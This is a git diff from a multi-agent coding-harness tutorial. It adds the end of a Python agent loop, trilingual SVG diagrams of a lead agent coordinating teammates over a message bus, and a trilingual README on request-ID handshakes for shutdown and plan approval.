model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject background results + bg = collect_background_results() + if bg: + messages.append({"role": "user", "content": [ + {"type": "tool_result", "tool_use_id": tid, "content": out} + for tid, out in bg.items()]}) + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s15: agent teams") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "has_cron": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms15 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + # Check inbox for teammate results after each turn + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)} messages]\033[0m") + for msg in inbox: + print(f" From {msg['from']}: {str(msg['content'])[:200]}") + print() diff --git a/s15_agent_teams/images/agent-teams-overview.en.svg b/s15_agent_teams/images/agent-teams-overview.en.svg new file mode 100644 index 000000000..f944cb126 --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.en.svg @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead Loop + Teammate Threads + MessageBus + + + + s10-s14 Preserved + + s15 New + + Teammate + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + spawn + + + + MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + send + send + send + + + Teammate: alice (Backend) + inbox → LLM → bash/read/write/send + Max 10 rounds → summary → BUS.send + + + Teammate: bob (Frontend) + Independent agent_loop, shared client + Thread(daemon=True) + + + Teammate: charlie (QA) + Cannot spawn other teammates + spawn → work → summary + + + + permission_request ↑ + + + Permission Bubbling: teammate → Lead + ① Teammate needs approval → BUS.send("permission_request") ② Lead check_inbox → user approval → reply approve/deny + + + + + s10-s14: prompt assembly, error recovery, task graph, background threads, cron scheduling + + s15: MessageBus + spawn_teammate_thread + send_message + check_inbox + permission bubbling + diff --git a/s15_agent_teams/images/agent-teams-overview.ja.svg b/s15_agent_teams/images/agent-teams-overview.ja.svg new file mode 100644 index 000000000..b2c82d521 --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.ja.svg @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead ループ + チームメイトスレッド + MessageBus + + + + s10-s14 保持 + + s15 新規 + + チームメイト + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + spawn + + + + MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + send + send + send + + + チームメイト: alice (Backend) + inbox → LLM → bash/read/write/send + 最大 10 ラウンド → summary → BUS.send + + + チームメイト: bob (Frontend) + 独立 agent_loop、共有 client + Thread(daemon=True) + + + チームメイト: charlie (QA) + 他のチームメイトを spawn 不可 + spawn → work → summary + + + + permission_request ↑ + + + 権限バブリング: チームメイト → Lead + ① チームメイトが承認必要 → BUS.send("permission_request") ② Lead check_inbox → ユーザー承認 → approve/deny 返信 + + + + + s10-s14:プロンプト組み立て、エラーリカバリ、タスクグラフ、バックグラウンドスレッド、cron + + s15:MessageBus + spawn_teammate_thread + send_message + check_inbox + 権限バブリング + diff --git a/s15_agent_teams/images/agent-teams-overview.svg b/s15_agent_teams/images/agent-teams-overview.svg new file mode 100644 index 000000000..f1639267a --- /dev/null +++ b/s15_agent_teams/images/agent-teams-overview.svg @@ -0,0 +1,129 @@ + + + + + + + + + + + + + + + + + + + + + + + + + Agent Teams — Lead Loop + Teammate Threads + MessageBus + + + + s10-s14 保留 + + s15 新增 + + Teammate + + + + + + cron_queue + + + + + messages + + + + + prompt + cache + + + + + LLM call + + + + + TOOL DISPATCH + bash · read · write · task(4) · cron(3) + ★ spawn_teammate · send_message · check_inbox + + + + + + + + + spawn + + + + + MessageBus (.mailboxes/*.jsonl) + + + + + + + + + + + + + + send + send + send + + + + Teammate: alice (Backend) + inbox → LLM → bash/read/write/send + 最多 10 轮 → summary → BUS.send + + + + Teammate: bob (Frontend) + 独立 agent_loop,共享 client + Thread(daemon=True) + + + + Teammate: charlie (QA) + 不能 spawn 其他 teammate + spawn → work → summary + + + + + + + + permission_request ↑ + + + 权限冒泡: teammate → Lead + ① 队友需审批 → BUS.send("permission_request") ② Lead check_inbox → 用户审批 → 回复 approve/deny + + + + + s10-s14: prompt 组装、错误恢复、任务图、后台线程、cron 调度 + + s15: MessageBus + spawn_teammate_thread + send_message + check_inbox + 权限冒泡 + diff --git a/s15_agent_teams/images/team-topology.en.svg b/s15_agent_teams/images/team-topology.en.svg new file mode 100644 index 000000000..3a0320286 --- /dev/null +++ b/s15_agent_teams/images/team-topology.en.svg @@ -0,0 +1,73 @@ + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ Teammates + + + + Lead Agent + Main loop + spawn + permission decisions + check_inbox receives teammate messages + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + own loop → inbox → work → reply + + + Bob (Frontend) + own loop → inbox → work → reply + + + Charlie (QA) + own loop → inbox → work → reply + + + + send + + inbox + + + + + + + + + send + send + send + + + + permission_request + + + permission_request + + + Permission Bubbling Flow + ① Teammate needs approval → BUS.send("permission_request") ② Lead check_inbox receives + ③ User approval → Lead replies approve/deny ④ Teammate receives → continue or reject + diff --git a/s15_agent_teams/images/team-topology.ja.svg b/s15_agent_teams/images/team-topology.ja.svg new file mode 100644 index 000000000..d1ccb4d0c --- /dev/null +++ b/s15_agent_teams/images/team-topology.ja.svg @@ -0,0 +1,73 @@ + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ チームメイト + + + + Lead Agent + メインループ + spawn + 権限決定 + check_inbox でチームメイトのメッセージ受信 + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + 独立 loop → inbox → 作業 → 返信 + + + Bob (Frontend) + 独立 loop → inbox → 作業 → 返信 + + + Charlie (QA) + 独立 loop → inbox → 作業 → 返信 + + + + send + + inbox + + + + + + + + + send + send + send + + + + permission_request + + + permission_request + + + 権限バブリングフロー + ① チームメイトが承認必要 → BUS.send("permission_request") ② Lead check_inbox で受信 + ③ ユーザー承認 → Lead が approve/deny 返信 ④ チームメイト受信 → 続行または拒否 + diff --git a/s15_agent_teams/images/team-topology.svg b/s15_agent_teams/images/team-topology.svg new file mode 100644 index 000000000..aa3624ef0 --- /dev/null +++ b/s15_agent_teams/images/team-topology.svg @@ -0,0 +1,83 @@ + + + + + + + + + + + + + + + + + + + + + + + Team Topology — Lead ↔ MessageBus ↔ Teammates + + + + Lead Agent + 主循环 + spawn + 权限决策 + check_inbox 接收队友消息 + + + + Message Bus (.mailboxes/*.jsonl) + + + + Alice (Backend) + 独立 loop → inbox → 干活 → 回复 + + + Bob (Frontend) + 独立 loop → inbox → 干活 → 回复 + + + Charlie (QA) + 独立 loop → inbox → 干活 → 回复 + + + + + send + + + inbox + + + + + + + + + + + send + send + send + + + + + permission_request + + + + permission_request + + + + 权限冒泡流程 + ① 队友需审批 → BUS.send("permission_request") ② Lead check_inbox 收到 + ③ 用户审批 → Lead 回复 approve/deny ④ 队友收到 → 继续或拒绝 + diff --git a/s16_team_protocols/README.en.md b/s16_team_protocols/README.en.md new file mode 100644 index 000000000..94b57e16b --- /dev/null +++ b/s16_team_protocols/README.en.md @@ -0,0 +1,205 @@ +# s16: Team Protocols — Teammates Need Agreements + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19 + +> *"Teammates need agreements"* — A single request-response pattern drives all negotiations. +> +> **Harness layer**: Protocols — Structured handshakes between agents. + +--- + +## The Problem + +In a company, firing an employee isn't slamming the table and saying "you're out." HR sends a formal notice, the employee says "OK, let me wrap up my work," finishes the handover, HR confirms. Every step has a paper trail — if something goes wrong, you can trace it. + +s15's teammates can work, but coordination is loose — Lead sends a message, teammate replies, no structured protocol. Two scenarios expose the problem: + +**Shutdown**: Lead wants Alice to shut down. Killing the thread directly → Alice's half-written file stays on disk. A handshake is needed: Lead sends a request, Alice confirms after wrapping up, then shuts down. + +**Plan approval**: Bob wants to refactor the auth module — a high-risk operation. Bob's plan should go through Lead for review first. Only after approval can Bob proceed. + +Both scenarios share the same structure: **one party sends a request, the other gives a response. Request and response are linked by the same ID.** It's not "send a message and hope they understand" — there's a state machine tracking: pending → approved / rejected. + +--- + +## The Solution + +![Team Protocols Overview](images/team-protocols-overview.en.svg) + +All s15 capabilities preserved (MessageBus, spawn_teammate, inbox polling). Three additions: **ProtocolState** (request state tracking), **dispatch_message** (route messages by type to handlers), **match_response** (link responses to requests via request_id). + +Two protocols, one mechanism: + +| Protocol | Direction | Purpose | +|------|------|------| +| shutdown_request / response | Lead → Teammate | Graceful shutdown handshake | +| plan_approval_request / response | Teammate → Lead | High-risk operations require approval first | + +--- + +## How It Works + +### ProtocolState: The Request's "File Card" + +Each protocol request creates a file card recording who sent it, to whom, current status, and attached content: + +```python +@dataclass +class ProtocolState: + request_id: str # Unique ID, e.g. "req_004281" + type: str # "shutdown" | "plan_approval" + sender: str # Initiator + target: str # Recipient + status: str # pending | approved | rejected + payload: str # Plan text or shutdown reason + created_at: float # Timestamp + +pending_requests: dict[str, ProtocolState] = {} +``` + +A file card is created when sending a request, and found via `request_id` when receiving a response to update the status. + +### The Four-Step Protocol Flow + +Using shutdown as an example, the full chain: + +``` +① Lead sends request + req_id = new_request_id() # "req_004281" + pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...) + BUS.send("lead", "alice", "shutdown_request", metadata={"request_id": req_id}) + +② Teammate receives → dispatch + inbox = BUS.read_inbox("alice") + msg_type = msg["type"] # "shutdown_request" + → route to handle_shutdown_request() + +③ Teammate responds + BUS.send("alice", "lead", "shutdown_response", + metadata={"request_id": req_id, "approve": True}) + +④ Lead receives response → match + match_response("shutdown_response", req_id, approve=True) + pending_requests[req_id].status = "approved" +``` + +`request_id` is the correlation key threading through the entire chain — the request carries it out, the response carries it back. + +### dispatch_message: Route by Type + +A teammate's inbox doesn't just receive plain messages — it also receives protocol messages. `handle_inbox_message` dispatches by message type: + +```python +def handle_inbox_message(name, msg, messages): + msg_type = msg.get("type", "message") + req_id = msg.get("metadata", {}).get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", "shutdown_response", + {"request_id": req_id, "approve": True}) + return True # Stop loop + + if msg_type == "plan_approval_response": + approve = msg["metadata"].get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve else "[Plan rejected]"}) + return False # Continue loop +``` + +New protocol type = new `if` branch, no new state machine needed. + +### State Machine: pending → approved / rejected + +Both protocols share the same state transitions: + +``` +pending ──approve──→ approved +pending ──reject───→ rejected +``` + +Shutdown uses this state machine, and so does plan approval. When Lead calls `review_plan(request_id, approve=True)`: + +```python +def run_review_plan(request_id, approve, feedback=""): + state = pending_requests.get(request_id) + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback, + "plan_approval_response", + {"request_id": request_id, "approve": approve}) +``` + +### Running It Together + +``` +1. Lead: "Have Alice create a file, then shut down" +2. Lead → spawn_teammate("alice", "backend", "Create config.py") +3. alice thread starts → write_file("config.py", "...") → done +4. Lead → request_shutdown("alice") + → BUS.send("shutdown_request", {request_id: "req_000142"}) +5. alice inbox receives → handle_shutdown_request → BUS.send("shutdown_response", + {request_id: "req_000142", approve: True}) +6. Lead check_inbox → match_response("req_000142", approve=True) + → pending_requests["req_000142"].status = "approved" +``` + +Complete shutdown handshake: request → confirm → shutdown. Every step traceable via `request_id`. + +--- + +## Changes from s15 + +| Component | Before (s15) | After (s16) | +|------|-----------|-----------| +| Coordination | Loose text messages | Structured request-response protocols | +| Request tracking | None | ProtocolState + pending_requests dict | +| Message routing | All treated as text | dispatch_message routes by type | +| Shutdown | Natural exit or thread kill | request_id handshake mechanism | +| High-risk operations | No gating | Plan submission → Lead approval → then execute | +| New message types | message, result | + shutdown_request/response, plan_approval_request/response | +| Lead tools | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) | +| Teammate tools | 4 | + submit_plan (5) | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s16_team_protocols/code.py +``` + +Try these prompts: + +1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.` +2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.` + +What to observe: Is the shutdown handshake complete (request → confirm → shutdown)? Does the `pending_requests` dict transition states correctly? Is the `request_id` consistent between request and response? + +--- + +## What's Next + +In s15-s16, Lead must assign every task to each teammate. "Alice does this, Bob does that." With 10 unclaimed tasks on the board, Lead has to manually assign 10 times. + +Can teammates **check the board and claim tasks themselves**? Lead just creates tasks — teammates discover, claim, and complete them on their own. + +s17 Autonomous Agents → Self-organizing teammates, no leader assignment needed. Poll when idle, work when available. + +
+Deep Dive into CC Source + +CC's team protocol implementation (`teammateMailbox.ts:720-850`) shares the same core structure as the tutorial — the request_id + approve/reject request-response pattern. Differences include: + +**Shutdown protocol**: CC's shutdown is **three-way communication**. Lead sends `shutdown_request` → teammate replies `shutdown_approved` (or `shutdown_rejected` with reason) → system sends `teammate_terminated` to notify all parties. After shutdown confirmation, the system auto-cleans panes (tmux/iTerm2), unassigns tasks, and removes members from team config. + +**Plan approval**: CC's `plan_approval_request` / `plan_approval_response` carries extra fields — approval can simultaneously set `permissionMode` (e.g. "approved but run in plan mode"), and responses can include a `feedback` string for teammates to revise and resubmit. + +**Message format**: CC's protocol messages are structured JSON (with Zod schema validation), while the tutorial uses simple type + metadata dicts. + +**Generality**: The tutorial's one FSM (pending→approved|rejected) covering two protocols — this simplification is completely correct. CC's protocol messages all share the same `request_id` correlation mechanism. + +
+ + diff --git a/s16_team_protocols/README.ja.md b/s16_team_protocols/README.ja.md new file mode 100644 index 000000000..009d8cc68 --- /dev/null +++ b/s16_team_protocols/README.ja.md @@ -0,0 +1,205 @@ +# s16: Team Protocols — チームメイト間には取り決めが必要 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19 + +> *"チームメイト間には取り決めが必要"* — 一つの request-response パターンが全ての交渉を駆動する。 +> +> **Harness 層**: プロトコル — Agent 間の構造化ハンドシェイク。 + +--- + +## 課題 + +会社で従業員を解雇する際、「お前はクラスだ」と机を叩くわけではない。HR が正式な通知を送り、従業員が「了解、引き継ぎを終わらせます」と答え、引き継ぎ完了後 HR が確認する。各ステップには書面記録があり、問題があれば遡れる。 + +s15 のチームメイトは作業できるが、連携は緩い — Lead がメッセージを送り、チームメイトが返信するだけで、構造化されたプロトコルがない。二つのシナリオが問題を露呈する: + +**シャットダウン**:Lead が Alice に終了を指示したい。スレッドを直接 kill → Alice の書きかけのファイルがディスクに残る。ハンドシェイクが必要:Lead が要求を送り、Alice が引き継ぎ完了後に確認して終了。 + +**計画承認**:Bob が認証モジュールをリファクタリングしたい — 高リスク操作。Bob の計画を Lead に見せ、承認後に実行すべき。 + +この二つのシナリオは構造が全く同じ:**一方が要求を送り、もう一方が応答する。要求と応答は同じ ID で紐付く。** 「メッセージを送って相手が理解してくれることを願う」ではなく、状態機械で追跡:pending → approved / rejected。 + +--- + +## ソリューション + +![Team Protocols Overview](images/team-protocols-overview.ja.svg) + +s15 の全機能を保持(MessageBus、spawn_teammate、inbox ポーリング)。3 つの追加:**ProtocolState**(要求状態追跡)、**dispatch_message**(メッセージタイプ別ルーティング)、**match_response**(request_id で応答と要求を紐付け)。 + +二つのプロトコル、一つの仕組み: + +| プロトコル | 方向 | 用途 | +|------|------|------| +| shutdown_request / response | Lead → チームメイト | 適切なシャットダウンハンドシェイク | +| plan_approval_request / response | チームメイト → Lead | 高リスク操作の事前承認 | + +--- + +## 仕組み + +### ProtocolState: 要求の「ファイルカード」 + +各プロトコル要求は、送信元、送信先、現在の状態、添付内容を記録するファイルカードを作成: + +```python +@dataclass +class ProtocolState: + request_id: str # 一意 ID、例: "req_004281" + type: str # "shutdown" | "plan_approval" + sender: str # 送信元 + target: str # 送信先 + status: str # pending | approved | rejected + payload: str # 計画テキストまたは終了理由 + created_at: float # タイムスタンプ + +pending_requests: dict[str, ProtocolState] = {} +``` + +要求送信時にファイルカードを作成し、応答受信時に `request_id` で該当カードを見つけて状態を更新。 + +### 4 ステップのプロトコルフロー + +シャットダウンを例に、完全な流れ: + +``` +① Lead が要求を送信 + req_id = new_request_id() # "req_004281" + pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...) + BUS.send("lead", "alice", "shutdown_request", metadata={"request_id": req_id}) + +② チームメイト受信 → dispatch + inbox = BUS.read_inbox("alice") + msg_type = msg["type"] # "shutdown_request" + → handle_shutdown_request() にルーティング + +③ チームメイト応答 + BUS.send("alice", "lead", "shutdown_response", + metadata={"request_id": req_id, "approve": True}) + +④ Lead が応答を受信 → match + match_response("shutdown_response", req_id, approve=True) + pending_requests[req_id].status = "approved" +``` + +`request_id` は全チェーンを貫通する関連キー — 要求がそれを持って出て行き、応答がそれを持って戻ってくる。 + +### dispatch_message: タイプ別ルーティング + +チームメイトの inbox は通常メッセージだけでなく、プロトコルメッセージも受信する。`handle_inbox_message` はメッセージタイプで振り分け: + +```python +def handle_inbox_message(name, msg, messages): + msg_type = msg.get("type", "message") + req_id = msg.get("metadata", {}).get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", "shutdown_response", + {"request_id": req_id, "approve": True}) + return True # ループ停止 + + if msg_type == "plan_approval_response": + approve = msg["metadata"].get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve else "[Plan rejected]"}) + return False # ループ継続 +``` + +新しいプロトコルタイプ = 新しい `if` 分岐。新しい状態機械は不要。 + +### 状態機械:pending → approved / rejected + +二つのプロトコルは同じ状態遷移を共有: + +``` +pending ──approve──→ approved +pending ──reject───→ rejected +``` + +シャットダウンも計画承認もこの状態機械を使う。Lead が `review_plan(request_id, approve=True)` を呼ぶと: + +```python +def run_review_plan(request_id, approve, feedback=""): + state = pending_requests.get(request_id) + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback, + "plan_approval_response", + {"request_id": request_id, "approve": approve}) +``` + +### 組み合わせて実行 + +``` +1. Lead: "Alice にファイルを作らせて、その後シャットダウン" +2. Lead → spawn_teammate("alice", "backend", "config.py を作成") +3. alice スレッド起動 → write_file("config.py", "...") → 完了 +4. Lead → request_shutdown("alice") + → BUS.send("shutdown_request", {request_id: "req_000142"}) +5. alice inbox 受信 → handle_shutdown_request → BUS.send("shutdown_response", + {request_id: "req_000142", approve: True}) +6. Lead check_inbox → match_response("req_000142", approve=True) + → pending_requests["req_000142"].status = "approved" +``` + +シャットダウンハンドシェイク完了:要求 → 確認 → 終了。各ステップは `request_id` で追跡可能。 + +--- + +## s15 からの変更 + +| コンポーネント | 変更前 (s15) | 変更後 (s16) | +|--------------|------------|------------| +| 連携方式 | 緩いテキストメッセージ | 構造化リクエスト・レスポンスプロトコル | +| 要求追跡 | なし | ProtocolState + pending_requests dict | +| メッセージルーティング | 全てテキストとして処理 | dispatch_message タイプ別振り分け | +| シャットダウン | 自然終了またはスレッド kill | request_id ハンドシェイク機構 | +| 高リスク操作 | ゲートなし | 計画提出 → Lead 承認 → 実行可能 | +| 新メッセージタイプ | message, result | + shutdown_request/response, plan_approval_request/response | +| Lead ツール | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) | +| チームメイトツール | 4 | + submit_plan (5) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s16_team_protocols/code.py +``` + +以下のプロンプトを試してください: + +1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.` +2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.` + +観察ポイント:シャットダウンハンドシェイクは完全か(要求 → 確認 → 終了)?`pending_requests` 辞書の状態は正しく遷移しているか?`request_id` は要求と応答で一貫しているか? + +--- + +## 次の章 + +s15-s16 では、Lead が各チームメイトにタスクを割り当てる必要がある。「Alice はこれ、Bob はあれ」。タスクボードに 10 個の未割り当てタスクがあれば、Lead は 10 回手動で assign しなければならない。 + +チームメイトが**自分でボードを見て、自分で認领**できたらどうか?Lead はタスクを作成するだけで、チームメイトが自分で発見、認領、完了する。 + +s17 Autonomous Agents → チームメイトの自己組織化。リーダーの割り当て不要。空き時にポーリング、仕事があれば実行。 + +
+CC ソースコード深掘り + +CC のチームプロトコル実装(`teammateMailbox.ts:720-850`)は、チュートリアル版と核心構造が同じ — request_id + approve/reject のリクエスト・レスポンスパターン。違いは以下の通り: + +**シャットダウンプロトコル**:CC のシャットダウンは**三方通信**。Lead が `shutdown_request` を送信 → チームメイトが `shutdown_approved`(または理由付き `shutdown_rejected`)で応答 → システムが `teammate_terminated` で全関係者に通知。シャットダウン確認後、システムが pane(tmux/iTerm2)を自動クリーンアップ、タスクの unassign、team config からメンバーを削除。 + +**計画承認**:CC の `plan_approval_request` / `plan_approval_response` は追加フィールドを持つ — 承認時に同時に `permissionMode` を設定可能(例:「承認するが plan mode で実行」)、応答にはチームメイトが修正して再提出するための `feedback` 文字列を含めることができる。 + +**メッセージ形式**:CC のプロトコルメッセージは構造化 JSON(Zod schema 検証付き)、チュートリアル版は単純な type + metadata 辞書。 + +**汎用性**:チュートリアル版の 1 つの FSM(pending→approved|rejected)で 2 つのプロトコルをカバー — この簡略化は完全に正しい。CC の全プロトコルメッセージは同じ `request_id` 関連メカニズムを共有。 + +
+ + diff --git a/s16_team_protocols/README.md b/s16_team_protocols/README.md new file mode 100644 index 000000000..4ee338341 --- /dev/null +++ b/s16_team_protocols/README.md @@ -0,0 +1,205 @@ +# s16: Team Protocols — 队友之间要有约定 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s14 → s15 → `s16` → [s17](../s17_autonomous_agents/) → s18 → s19 + +> *"队友之间要有约定"* — 一个 request-response 模式驱动所有协商。 +> +> **Harness 层**: 协议 — 模型之间的结构化握手。 + +--- + +## 问题 + +公司里让员工离职,不是拍桌子说"你走"。HR 发正式通知,员工说"好,我收尾手头工作",收完交接,HR 确认。每一步都有书面记录,出了问题能追溯。 + +s15 的队友能干活了,但协调是松散的——Lead 发消息,队友回复,没有结构化的协议。两个场景暴露了问题: + +**关机**:Lead 想让 Alice 关机。直接杀线程 → Alice 写了一半的文件留在磁盘上。需要握手:Lead 发请求,Alice 确认收尾后关机。 + +**计划审批**:Bob 想重构认证模块——高风险操作。应该先让 Lead 看 Bob 的计划,审批通过后 Bob 才能动手。 + +这两个场景结构完全一样:**一方发请求,另一方给回复。请求和回复通过同一个 ID 关联。** 不是碰运气说"发个消息希望对方看懂",而是有状态机追踪:pending → approved / rejected。 + +--- + +## 解决方案 + +![Team Protocols Overview](images/team-protocols-overview.svg) + +s15 的全部能力保留(MessageBus、spawn_teammate、inbox 轮询)。新增三样:**ProtocolState**(请求状态追踪)、**dispatch_message**(按消息类型路由到处理器)、**match_response**(通过 request_id 关联回复与请求)。 + +两种协议,一套机制: + +| 协议 | 方向 | 用途 | +|------|------|------| +| shutdown_request / response | Lead → 队友 | 体面关机握手 | +| plan_approval_request / response | 队友 → Lead | 高风险操作先审批 | + +--- + +## 工作原理 + +### ProtocolState: 请求的"档案卡" + +每个协议请求创建一张档案卡,记录谁发的、发给谁、当前状态、附带内容: + +```python +@dataclass +class ProtocolState: + request_id: str # 唯一 ID,如 "req_004281" + type: str # "shutdown" | "plan_approval" + sender: str # 发起方 + target: str # 接收方 + status: str # pending | approved | rejected + payload: str # 计划文本或关机原因 + created_at: float # 时间戳 + +pending_requests: dict[str, ProtocolState] = {} +``` + +发请求时创建档案卡,收回复时通过 `request_id` 找到对应卡片,更新状态。 + +### 四步协议流程 + +以关机为例,完整链路: + +``` +① Lead 发请求 + req_id = new_request_id() # "req_004281" + pending_requests[req_id] = ProtocolState(type="shutdown", status="pending", ...) + BUS.send("lead", "alice", "shutdown_request", metadata={"request_id": req_id}) + +② 队友收到 → dispatch + inbox = BUS.read_inbox("alice") + msg_type = msg["type"] # "shutdown_request" + → 路由到 handle_shutdown_request() + +③ 队友回复 + BUS.send("alice", "lead", "shutdown_response", + metadata={"request_id": req_id, "approve": True}) + +④ Lead 收响应 → match + match_response("shutdown_response", req_id, approve=True) + pending_requests[req_id].status = "approved" +``` + +`request_id` 是贯穿全链路的关联键——请求带着它出去,回复带着它回来。 + +### dispatch_message: 按类型路由 + +队友的 inbox 不只收普通消息,还收协议消息。`handle_inbox_message` 按消息类型分发: + +```python +def handle_inbox_message(name, msg, messages): + msg_type = msg.get("type", "message") + req_id = msg.get("metadata", {}).get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down.", "shutdown_response", + {"request_id": req_id, "approve": True}) + return True # 停止循环 + + if msg_type == "plan_approval_response": + approve = msg["metadata"].get("approve", False) + messages.append({"role": "user", + "content": "[Plan approved]" if approve else "[Plan rejected]"}) + return False # 继续循环 +``` + +新增协议类型 = 新的 `if` 分支,不需要新状态机。 + +### 状态机:pending → approved / rejected + +两种协议共用同一个状态转换: + +``` +pending ──approve──→ approved +pending ──reject───→ rejected +``` + +关机用这个状态机,计划审批也用。Lead 调 `review_plan(request_id, approve=True)` 时: + +```python +def run_review_plan(request_id, approve, feedback=""): + state = pending_requests.get(request_id) + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, feedback, + "plan_approval_response", + {"request_id": request_id, "approve": approve}) +``` + +### 合起来跑 + +``` +1. Lead: "让 Alice 创建一个文件,然后关机" +2. Lead → spawn_teammate("alice", "backend", "创建 config.py") +3. alice 线程启动 → write_file("config.py", "...") → 完成 +4. Lead → request_shutdown("alice") + → BUS.send("shutdown_request", {request_id: "req_000142"}) +5. alice inbox 收到 → handle_shutdown_request → BUS.send("shutdown_response", + {request_id: "req_000142", approve: True}) +6. Lead check_inbox → match_response("req_000142", approve=True) + → pending_requests["req_000142"].status = "approved" +``` + +关机握手完整:请求 → 确认 → 关机。每一步有 `request_id` 追溯。 + +--- + +## 相对 s15 的变更 + +| 组件 | 之前 (s15) | 之后 (s16) | +|------|-----------|-----------| +| 协调方式 | 松散文本消息 | 结构化请求-响应协议 | +| 请求追踪 | 无 | ProtocolState + pending_requests dict | +| 消息路由 | 全部当文本处理 | dispatch_message 按类型分发 | +| 关机 | 自然退出或杀线程 | request_id 握手机制 | +| 高风险操作 | 无门控 | 计划提交 → Lead 审批 → 才能执行 | +| 新消息类型 | message, result | + shutdown_request/response, plan_approval_request/response | +| Lead 工具 | 10 (s15) | + request_shutdown, submit_plan, review_plan (13) | +| 队友工具 | 4 | + submit_plan (5) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s16_team_protocols/code.py +``` + +试试这些 prompt: + +1. `Spawn alice as a backend dev. Ask her to create a file. Then request her shutdown.` +2. `Spawn bob with a refactoring task. Have him submit a plan first. Then review and approve it.` + +观察重点:关机握手是否完整(请求 → 确认 → 关机)?`pending_requests` 字典里的状态是否正确转换?`request_id` 是否在请求和响应之间保持一致? + +--- + +## 接下来 + +s15-s16 中,Lead 必须给每个队友分配任务。"Alice 做这个,Bob 做那个"。任务看板上有 10 个未认领的任务,Lead 得手动 assign。 + +能不能让队友**自己看板、自己认领**?Lead 只需要创建任务,队友自己发现、自己认领、自己完成。 + +s17 Autonomous Agents → 队友自组织,不需要领导分配。空闲时轮询,有活就干。 + +
+深入 CC 源码 + +CC 的团队协议实现(`teammateMailbox.ts:720-850`)和教学版在核心结构上一致——request_id + approve/reject 的请求-响应模式。差异在于: + +**关机协议**:CC 的 shutdown 是**三向通信**。Lead 发 `shutdown_request` → 队友回复 `shutdown_approved`(或 `shutdown_rejected` 附原因)→ 系统发送 `teammate_terminated` 通知所有相关方。关机确认后系统自动清理 pane(tmux/iTerm2)、unassign 任务、从 team config 移除成员。 + +**计划审批**:CC 中 `plan_approval_request` / `plan_approval_response` 携带额外字段——审批时可同时设置 `permissionMode`(如"批准但以 plan mode 运行"),响应中可包含 `feedback` 字符串供队友修正后重新提交。 + +**消息格式**:CC 的协议消息是结构化的 JSON(有 Zod schema 验证),教学版用简单的 type + metadata 字典。 + +**通用性**:教学版的一个 FSM(pending→approved|rejected)对应两种协议——这个简化完全正确。CC 的所有协议消息共用同一个 `request_id` 关联机制。 + +
